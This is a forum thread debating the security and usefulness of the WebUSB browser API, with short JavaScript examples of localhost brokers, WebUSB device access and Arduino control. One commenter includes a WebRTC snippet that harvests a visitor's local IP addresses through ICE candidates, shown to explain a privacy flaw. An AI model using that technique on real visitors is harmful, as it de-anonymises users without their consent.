If only it were that simple. Consider the end goal: to write a program that causes your monitor to invoke a certain visual experience in the viewer. It's not simply "To show blue" or "To show a certain shade of purple." Those are all meaningless terms without context. Their results are entirely relative, right? If you put some purple next to some blue, whether or not it looks good depends on the background color (called the "surround").
The trouble is, "whether or not it looks good" is also determined by your environment. Some people have crappy monitors, some people have perfect monitors, sometimes it's nighttime, sometimes your room is being lit by the early morning sun. When you look at a screen, all of these factors combine, and leaves you with the impression that something looks good or looks bad.
It gets worse. When you look at a monitor, what's behind your monitor is usually the most important thing. I.e. is the wall in front of you white, or green? Is it dark, or lit by the sun? That's going to affect how you see what's on the monitor. What's behind you is irrelevant, because you can't see it! It doesn't matter at all if the wall behind you is white or black, except insofar as it affects the colors of the wall in front of you. So not only do you need to account for all of the factors outlined above, but the damn thing needs to be aimed properly. I'm pretty sure that the right answer will look something like a sensor that mounts to the back of a laptop screen. But it also needs a sensor pointed at your face, and another sensor pointed straight at your monitor. Only at that point do you begin to have enough information to start writing a program that can make correct decisions.
I don't think direct access to USB devices like you're suggesting is a good step forward, if for nothing other than practicalities. Think about how many individual USB light sensors your websites would have to support to enable this small feature, and the amount of low-level code in such a high-level language. Abstractly that's a great idea, but it could as easily be added with an addon or browser extension.
I'm not saying it's a bad idea, just that this direct path in implementation is.
There are many other (better) ways of implementing it, like the Mozilla light sensor API. If that doesn't satisfy you, you should create a new spec for light sensors combined with a practical implementation and then push W3C to use your spec over Mozilla's.
It's the only way to do it. The light sensor delivers a realtime feed of what your eye currently sees. A website can react appropriately.
It's actually more powerful than monitor calibration. Calibration doesn't account for the viewing condition (the brightness of your environment) whereas this hardware can.
It's a device, so it can feed the information to all the programs on your computer. WebUSB is a way to make it useful from day one, but it's not the sole target.
> WebUSB is a way to make it useful from day one
If WebUSB were marketed with this business goal, then why not (except nobody would buy it)? But the implications are so much wider, in terms of security and usability...
Why not WebSATA? WebPCI?
There are certainly a few key actors who would benefit from such a standard (the benefit could be time to market), I'm just not sure there are enough benefits for the end user to justify a new standard!
> And I can't think of any convenient way to do it other than WebUSB.
Simple: deliver a native application with your sensor that the user has to install (maybe it could even be installed automatically through PnP). This application would provide a webserver on localhost which exposes the lighting information to interested websites. And in contrast to the WebUSB approach it would mediate access to the USB device (lots of browser windows and processes can get the information instead of only a single one) and it would guarantee that only the relevant information is forwarded, not arbitrary data on a USB channel.
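A minimal sketch of that broker pattern (Node.js; the port, JSON shape, and stubbed sensor call are all invented for illustration):

```js
const http = require('http');

const readSensor = () => 0.42; // stub standing in for the real native driver call

http.createServer((req, res) => {
  res.setHeader('Access-Control-Allow-Origin', '*'); // or lock this to specific origins
  res.setHeader('Content-Type', 'application/json');
  res.end(JSON.stringify({ lux: readSensor() }));    // only this curated value leaves
}).listen(9123, '127.0.0.1');
```

Any number of pages and tabs can then poll that endpoint concurrently, which is exactly the multi-client property a single claimed USB interface can't give you.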
Installing native applications is not always easy and straightforward, especially in a commercial environment or an environment with multiple operating systems. An enterprise rarely wants to push out new applications to every user because it's a pain to support. But tell them to go to a new web app? Easy.
I'm a big fan of native apps over web apps. But web apps have a huge practicality that's hard to ignore.
I'm very aware of that, as I have worked for a big corporation with such policies for normal users. However I believe that for them browsers which directly access real hardware will seem like an even bigger nightmare than users installing applications.
And you still have the question of how the web app comes to the user. Through a dedicated intranet site? Makes sense if more than one user requires it, but the effort seems similar to packaging a native application and rolling it out automatically through IT's deployment system. If only very few users (maybe only a single one) require that hardware, both approaches have a high overhead and supporting the device will most likely be rejected.
Getting this web app directly from a third-party site will be mostly out of the question for the companies you are talking about. Besides the security implications, we are then also talking about reliability problems ("I can't use my USB device because the internet is down...").
> browsers which directly access real hardware will seem like an even bigger nightmare than users installing applications.
If you look at the spec it doesn't directly access hardware and it even acknowledges doing so could be a big security issue. You interface with an abstraction that sits above the hardware that won't give you direct access but, instead, access to a subset of options that pass through the abstraction.
> Through a dedicated intranet site? Makes sense if more than one user requires it, but the effort seems similar to packaging a native application and rolling it out automatically through IT's deployment system.
I'm not sure how you can compare the rollout of a native application to all user computers versus publishing within an intranet. They are not even in the same league in terms of deployment. Intranet is far, far easier. The native application has to be pushed out, installed and verified. A web app simply has to have its link emailed to users. Hell you could even push out a bookmark over many IT management systems (which is far easier than dealing with pushing out an application).
So I see a lot of negative comments about the security implications of this. Presuming that the browser gates access to USB devices in the same way it gates access to geolocation, what's the risk here? How is it different than installing 3rd party software on your OS?
I've read about the "inner platform" effect, and I don't know. I'm just not convinced it's a bad thing here. For all its warts, the web is far and away the best cross-platform application delivery system. Use this in conjunction with things like IPFS and browser-based persistent storage, and you can run signed versions of trusted, auditable code that can do lots of awesome stuff. Without users having to futz with installers.
>How is it different than installing 3rd party software on your OS?
The whole act of downloading and installing?
For desktop apps, you have to do that.
For webapps, you just have to visit a page (or even not, thanks to XSS).
And while we install 2-5 or maybe 20 apps per year (at most, some don't install anything after they get their PCs), we visit 100s of pages each day, and 1000s each month.
Also, while we can realistically restrict our app downloads to legitimate sources (the App Store, the product's webpage etc), we read stuff from all over the place -- that's what links are there for.
I'd like to know too, because I just can't accept that the answer to security issues is just "Don't do that"...
It really looks like they are doing this right. Fully behind permissions that are already protected against clickjacking, very limited scope, requires HTTPS, and is being implemented with security as a first priority.
People are acting like access to USB is something that no PC should ever do...
At the moment, nothing in a browser is direct access. Everything is abstracted, which includes the filesystem and geolocation. This provides a layer of security against massive horrible bugs in the OS. With WebUSB there seems to be very little abstraction: all the values you pass to it are sent on to the device. Small bugs once protected by numerous layers of security, usually requiring superuser abilities, are now made massive as they are connected to one of the largest fuzzers there is: the internet.
> Presuming that the browser gates access to USB devices in the same way it gates access to geolocation, what's the risk here? How is it different than installing 3rd party software on your OS?
Except that most people will easily dismiss the "are you sure" warnings to the point that I could see browser developers eventually defaulting that to enabled and not asking ("it's for better UX!")
The desktop is unfortunately moving in a similar direction (witness all the telemetry in Windows 10, etc.) but there at least seems to be a greater notion of user control than with what browsers are turning into.
Are there any examples of that happening on the web yet? All browser vendors agree that most of these new features need to be behind explicit permissions.
Hell people are still complaining about full screen permissions pop-ups and no browser has gotten rid of them yet because they know the problems that could come from it.
If anything there is a push to go the other direction, making previously "enabled by default" things behind permissions.
You're right that they're (ostensibly) placing emphasis on permissions at the moment, but I don't see that staying the same if websites start adopting and using these features in any quantity.
> Are there any examples of that happening on the web yet? All browser vendors agree that most of these new features need to be behind explicit permissions.
Well, WebRTC is enabled by default. Exposes your real IP, and allows anyone to portscan your whole LAN.
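For the curious, the leak needed no permission prompt at all as originally shipped (newer browsers mitigate it by obfuscating host candidates):

```js
// Classic local-IP disclosure via ICE host candidates; data channels
// require no camera or microphone permission.
const pc = new RTCPeerConnection({ iceServers: [] });
pc.createDataChannel('');
pc.onicecandidate = (e) => {
  if (e.candidate) console.log(e.candidate.candidate); // host candidates embed local IPs
};
pc.createOffer().then((offer) => pc.setLocalDescription(offer));
```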
WebRTC never had permissions so that's not an example of a feature that had its permissions removed after a time.
And that was actually the feature I had in mind in my last paragraph. There is a pretty big push to put it behind a permissions window (at least for local network access).
Why was something like this ever implemented without permissions anyway?
If such a big mistake is made – releasing info about devices in the LAN, de-anonymizing people, and releasing location data – then what mistakes will be made with WebUSB or WebFilesystemAccess?
I seriously don’t want anything to ever have access to anything unless I grant it.
There’s a reason UNIX has no execute permissions by default for files, and a reason why I use SELinux.
This whole browser shit destroys the whole security model.
Many consider it a mistake (I sure as hell do), hence everything else being behind a permissions model.
I could ask you why SELinux is necessary in the first place, but the fact is that mistakes are made and learned from, and additional software is made to fill in the gaps.
If you want that amount of control, there are plugins that grant it, and using a plugin is much like using SELinux to fill in gaps or mistakes in the platform.
Software will never be bug-free, and that's not an excuse to never write any more software.
That's a massive strawman. You might as well argue that browser vendors will eventually default to allowing programs to be installed without user intervention.
Look at WebRTC for an example. Despite there being zero convincing scenarios for silent P2P data channels that discard your explicit networking (proxy) settings, they're turned on in all browsers.
Fun conversation: I asked someone involved with WebRTC for a real, non-video example, and they honestly suggested "maybe your browser wants to talk to your fridge and would benefit from data channel encryption". So far out of touch with reality.
Wouldn't surprise me in the least if, for instance, this ends up allowing enumeration by default or something else.
The difference is that we don't allow websites to install third party software on your OS just by convincing the user to click yes on a dialog box - not anymore, not after what happened with ActiveX. Also, it's probably not obvious to most users that giving a website access to an innocent-looking USB device is in fact equivalent to giving it full access to their PC.
> First, so that the device can protect itself from malicious sites it can provide a set of origins that are allowed to connect to it.
Sounds kinda DRM-ey. The CORS system works because the owner of a URL is the person who can attach headers to responses. That doesn't hold here: the owner of a device is the person who owns it, not the manufacturer who decides what metadata it broadcasts (though obviously working out what the UX should be is a hard problem).
This particular restriction is intended to address things like authentication devices (e.g. gnubby) where you basically destroy the entire security model if a user accidentally allows a malicious website to connect to it.
That said, the last round of discussions gave me the impression that browsers generally (and Chrome in particular) are leaning towards implementing this as a very prominent warning rather than an outright block.
It would be nice if this spec were implemented in major browsers, allowing JavaScript access to USB crypto tokens.
In my country (and, AFAIK, in many other places) those tokens are used for government services that require a digital signature. A few years ago, Java applets were widely used to provide that functionality; there was no other way for JavaScript to reach a crypto token. It wasn't smooth, but it worked. Now that Java applets have disappeared from major browsers, websites make you download a program which, once run, listens on a local port, and the website uses a WebSocket to communicate with it. This is much more complicated for the user, especially on a non-Windows OS.
If JavaScript were able to access USB crypto devices directly, the user-experience improvement would be huge.
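For those who haven't dealt with it, the workaround looks roughly like this; the port and message format are invented here, since every vendor rolls their own:

```js
// Hypothetical sketch of the "local signing agent" workaround: a native
// program installed by the user listens on localhost, and the web page
// talks to it over a WebSocket. Port and protocol are placeholders.
const agent = new WebSocket("ws://127.0.0.1:9876/sign");

agent.onopen = () => {
  // Ask the local agent to sign a document hash with the USB token.
  agent.send(JSON.stringify({ op: "sign", hash: "deadbeef" })); // placeholder hash
};

agent.onmessage = (event) => {
  const reply = JSON.parse(event.data);
  console.log("signature from token:", reply.signature);
};
```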
This is actually pretty exciting. I can see plugging into an arbitrary computer and visiting https://www.yourdevicemanufacturer.com/ to manage your personal devices really taking off. No drivers or shitty apps to install or update? This will be huge.
I can see why people would be concerned about attack surface, but if you're plugging your devices into foreign USB ports, you're potentially 0wned already. At least this way, if it's done right with regard to permissions, the driver side will always be up to date. Plus JavaScript is memory-safe.
Holy freakin ghost though, this should be HTTPS only.
The problem is that every website you give USB access to can keylog anything you type. Nobody here cares about foreign ports or whatever.
I can already use all three of my USB devices (mouse, keyboard, flash drive) in conjunction with websites. Where is the supposed utility? Beyond some niches like connecting an Arduino or a gamepad, I can't see this being useful.
Standard device classes include keyboard, mice, audio, video and storage devices. Operating systems support such devices using the "class driver" provided by the OS vendor. There is however a long tail of devices that do not fit into one of the standardized device classes. These devices require hardware vendors to write native drivers and SDKs in order for developers to take advantage of them and this native code prevents these devices from being used by the web.
Read the spec. It doesn't grant access to your USB devices directly. It's an abstraction layer, gated similarly to how geolocation works, and the vendor decides how much of the device the web browser can touch. It's actually pretty clever.
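To make that concrete, here's a minimal sketch of the gating model, assuming the current draft API: the page can't enumerate anything; it asks, the browser shows a device chooser, and the script only ever sees what the user picked.

```js
// requestDevice must be called from a user gesture, e.g. a click.
const button = document.querySelector("#connect"); // hypothetical button
button.addEventListener("click", async () => {
  const device = await navigator.usb.requestDevice({
    filters: [{ vendorId: 0x2341 }], // 0x2341 is Arduino's vendor ID
  });
  console.log("user granted access to:", device.productName);
});
```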
Though I agree with the concerns about security, I can personally think of a cool use case: http://knightos.org. It'd be nice if users could just plug in a calculator and install KnightOS on it from any web browser. Ditto with https://packages.knightos.org - plug in a calculator and click a button to install the package.
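A hedged sketch of what that installer flow might look like on top of the draft API; the configuration, interface, and endpoint numbers here are placeholders, not the calculator's real values:

```js
// Illustrative only: 0x0451 is Texas Instruments' vendor ID, but the
// rest of the numbers are made up for the sketch.
async function installImage(imageBytes /* Uint8Array */) {
  const device = await navigator.usb.requestDevice({
    filters: [{ vendorId: 0x0451 }],
  });
  await device.open();
  await device.selectConfiguration(1);
  await device.claimInterface(0);
  // Push the image to a bulk OUT endpoint in small chunks.
  for (let offset = 0; offset < imageBytes.length; offset += 64) {
    await device.transferOut(2, imageBytes.subarray(offset, offset + 64));
  }
  await device.close();
}
```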
This is what happens when the generation that brought us front ends that require 450MB of memory to display a web page start aging and join committees.
This trend of shoving as much functionality into browsers as possible is really worrying. It's indicative of lazy architecting, because most of the time the complex features you desire are fully available through native OS APIs. There does not need to be a bridge for every feature in the browser. For apps using OS-level APIs, more often than not, users need to grant some permission to access the device. The permission scopes in modern operating systems are strict and hardened; it would be very difficult for an app to execute a "drive-by" exploit without first requesting some form of permission. At the very least, the user needs to explicitly download the app onto their device (as opposed to simply viewing a webpage). The permissions APIs of browsers, compared to the OS's, are less mature, operate in userspace, and are inherently less secure.
If an exploit exists in the browser, suddenly every device with that browser becomes vulnerable to a drive-by exploit, as opposed to only the devices that downloaded a single malicious app. The user may be completely unaware, because there is no download confirmation or permission grant involved in viewing a webpage (assuming the exploit bypasses the browser's weak permissions API). A malicious actor could load the exploit into an iframe via an ad network and the user would have no idea.
A lot of points about the dangers of exposing a USB device to the internet. I'm concerned about a future where all my USB devices require internet access. Is network chatter destined to increase until nothing we own will function without phoning home? It's a firewall headache.
> A lot of points about the dangers of exposing a USB device to the internet.
It gets exposed to the web browser, not the internet. Devices become accessible via a usb:// protocol and use JavaScript for interaction. They gain no low-level access.
> I'm concerned about a future where all my USB devices require internet access.
Many people on HN are worried about that, but why mention it in a comment on this article? Did you read it? It exposes USB devices to the web browser through an API that has parts similar to CORS. You'll be able to take a USB device and interface with it using an offline, HTML5 web application.
The point of my comment is that the things you want to omit have nothing to do with Servo. Servo's modularity is irrelevant to removing webcam access, which incidentally I believe you can already do in both Firefox and Chrome by disabling the MediaSource API altogether.
Servo isn't strictly just the HTML+CSS part, if you have a look at the project's sources.
Modularity is relevant because if stuff isn't modular, you need extra code paths to deal with missing functionality, and you'll have a much bigger burden to carry, a.k.a. a fork.
In Firefox (and maybe Chrome; I don't use it, so I'm not sure) you can disable it in the configuration, but it could easily be re-enabled by some script or extension.
If implemented right this could be fantastic, especially for devices like Chromebooks, but am I reading it right that this API basically brings hardware drivers to JavaScript?
* Nodebots - http://nodebots.io/ for controlling a multitude of hardware via Node.js over Bluetooth, BLE, or USB/serial (which most hacker-level hardware still prefers).
Ideally the world would converge on a single unified implementation; that said, there are a lot of differences between USB serial, USB HID, and a multitude of other communication methods over USB.
TL;DR: you can do hardware with JS already; this should make things in the browser slightly easier (one less dependency) at the risk of making it available to all things.
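For reference, here's roughly what the Node.js side looks like today with johnny-five, assuming an Arduino running the standard Firmata firmware on a USB serial port:

```js
// Node.js, using johnny-five to drive an Arduino over USB serial.
const five = require("johnny-five");
const board = new five.Board(); // auto-detects the board's serial port

board.on("ready", () => {
  const led = new five.Led(13); // onboard LED pin on most Arduinos
  led.blink(500);               // toggle every 500 ms
});
```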
You'll find that most USB drivers do very little beyond moving bytes from one place to another, so it's kind of a natural fit because it can enable a lot of convenience for end users. (Think kids trying to program their Arduino, or a web-based GUI for your ham radio... things like that.)
It would be more natural to add a new IP-over-USB device class and let products opt in to bring an IoT experience without invading the entire legacy stack and exposing all its security holes.
Nothing says "I love you" more than malware persistently embedded in your USB devices.
Here's how hardware teams work (in my experience)
----
Manager: "Hmmm... we need firmware. Hey, who can update the USB stack for the next version of our USB toaster?"
Team: shrug
Manager: "Figby! Don't you do Arduino stuff on the weekends? You do it. Be done next Friday."
Figby: "Meep?"
USB is hard enough to get working properly, now you need to add "resistance to attack from the host" to the feature set. Figby is in trouble because he's being crushed under four rocks now:
1. USB is hard to get working. The standard is pretty complicated and, speaking frankly here, the device class standards are pretty badly fucked up. Camel-by-committee-grade bad. You spend a lot of time getting edge cases to work. (Don't get me started on DFU, OMFG.)
2. Figby probably has a bunch of legacy to deal with. If the USB stack he's working with started from a fine commercial framework, he's better off. But he's likely working with something horrible hatched by a former semi-hardware guy a while ago, who was fired because six months into the prior version of the project, management finally realized he could barely spell 'C'. Oh, and the code makes liberal use of #define, and the source doesn't use curly braces, but DO..OD and WHILE..ELIHW, and there is deep, deep misunderstanding of what 'volatile' actually does.
3. Figby also has to work with the host driver team. If they are not actively hiding from the hardware team, they are either on the wrong side of the planet or have absolutely no time to devote to USB issues. The new driver will arrive about three days after Figby's "golden master" date.
4. Figby has no time. Everything is feature work. If there are security bugs in the code (... and there are) they have been ignored or deferred as "won't fix" for several product versions. If there are security reviews, they are cursory check-off meetings where people who don't know anything about security make collective shrugs around bugs that are embedded in the product at the level of DNA. The code is swiss-cheese and would take months to make a dent in. Besides, this is a hardware company; isn't the OS supposed to keep us safe?
... now this WebUSB thing lands on Figby's plate. "Marketing really really wants this feature so they can add another checkbox to the package." What are the chances that Figby's going to fix security issues in the product before just turning the thing on for the whole internet to see? Because Friday.
Figby adds command handlers and descriptors for WebUSB. He'll get to the security stuff later, when the rest of everything else works.
Promoting the browser to the OS level!? Read-only access for private-key loading may be useful, but beyond that this seems dangerous. Use the standard download-and-save method.
Android and iOS apps tend to require "explicit" user permissions when installing them. I put "explicit" in quotes because it's really implicit: accept these terms or don't use the app.
How many people actually look at these before clicking install?
They're not fine-grained enough to let the user weigh up the security implications, which leads to apps requesting every permission under the sun, or just outright refusal to use the app (by a small minority who know the script).
We can see how this will pan out in the browser: The browsers will initially offer the "allowed devices" set that is described here, but eventually users will find it "too confusing", and they'll reduce it to "Do you want to allow this website to access any USB device?"
The common user will get fed up with this popup appearing, and the browser vendors will happily oblige with an enabled-by-default option: "Allow websites to access my USB devices".
Then some giant (i.e., Google) will provide SaaSS to filter which devices can be accessed from which websites for you. Browser vendors will be quick to use this service, turned on by default, much the same way they use Google for anti-phishing and whatnot now without asking the user.
Yet another browser aperture that will require the usual multitude of post-implementation band-aid security fixes.
Sigh.
We get it.
We could make the browser the OS.
But should we? Not just could we?
I actually miss the days where the browser would be an application to view and consume content, with a modicum of scripting to progressively enhance the experience.
Why shouldn't we? Security on the browser level is actually stricter than that at the OS level most of the time. Any app you download from any random place and run can access your webcam - but a webapp has to request it.
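To make the comparison concrete, the entire gate for a web app is one call that the browser interposes a prompt on:

```js
// The page cannot touch the camera except through this call, and the
// browser shows a permission prompt before the promise resolves.
async function startWebcam() {
  const stream = await navigator.mediaDevices.getUserMedia({ video: true });
  document.querySelector("video").srcObject = stream; // assumes a <video> tag
}
```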
I don't think the web makes Trojans or security flaws any more likely; it just changes where they sit. At the OS level you've got buffer overflows, which have been common for years, and bash-injection vulnerabilities.
The issue is if someone can break out of the sandbox. I think it's perfectly acceptable to make a web technology that can be the OS. I don't see any reason that such progress should be halted.
The browser was an application to view and consume content. Basically a book reader where you could access thousands of books just by putting in the right URL to the book.
Now it's the same thing, but for applications. For features, functionality. With the right standards it's cross-platform: write once, run anywhere. With improving specs and browser vendors caring about speed and UX, it can begin to reach the same speeds anything "native" could.
I don't think the security risks outweigh the benefits, and even with those risks we can work hard to mitigate them.
The reason people are making the browser the OS is because there's money in it. Ad money, SaaS money, middleman money.
People whose computers already do useful things, for free, will obviously think that moving everything into the browser is stupid. But if you look at it from the perspective of the profit-driven companies and people pushing for it, the motivation is reasonable, if evil.
The reason I want to make the browser the OS is accessibility. Every other platform requires limiting your audience to a certain kind of person, usually drawn fairly close to class lines. I like software that's easily accessible to anyone interested, with a minimum of fuss from a usability perspective. The web is the only platform that matches that description.
Its big limitation is hardware access, so things like WebUSB, WebRTC, etc are great in my book.
As a blind person, I'll be the first to tell you that a vast majority of web technologies are built with accessibility as an afterthought at most. Just about when we've figured out how to make good accessible native apps, everything's going into the browser and it's a giant mess. Ugh.
I mean accessibility in a much broader sense than just hearing and vision impaired.
That said, your point is fully valid. The web is a wild untamed place, and without gatekeepers there is no one to impose rules that help people like you.
I think we will overcome that with upcoming toolkits, particularly conversational UI toolkits, but... Well, point taken. :)
It took years to put band-aid security measures onto a standard that initially allowed random websites to dump your VRAM contents and/or remotely exploit kernel-layer video driver bugs.
And graphics drivers/hardware are a much easier market to control than USB devices: you have five or six GPU vendors to yell at (and whose broken driver versions you can blacklist), versus tens of thousands of USB vendors.
If you're implementing this... please stop. This will cause serious problems. There is no reason whatsoever to allow remote access to USB devices.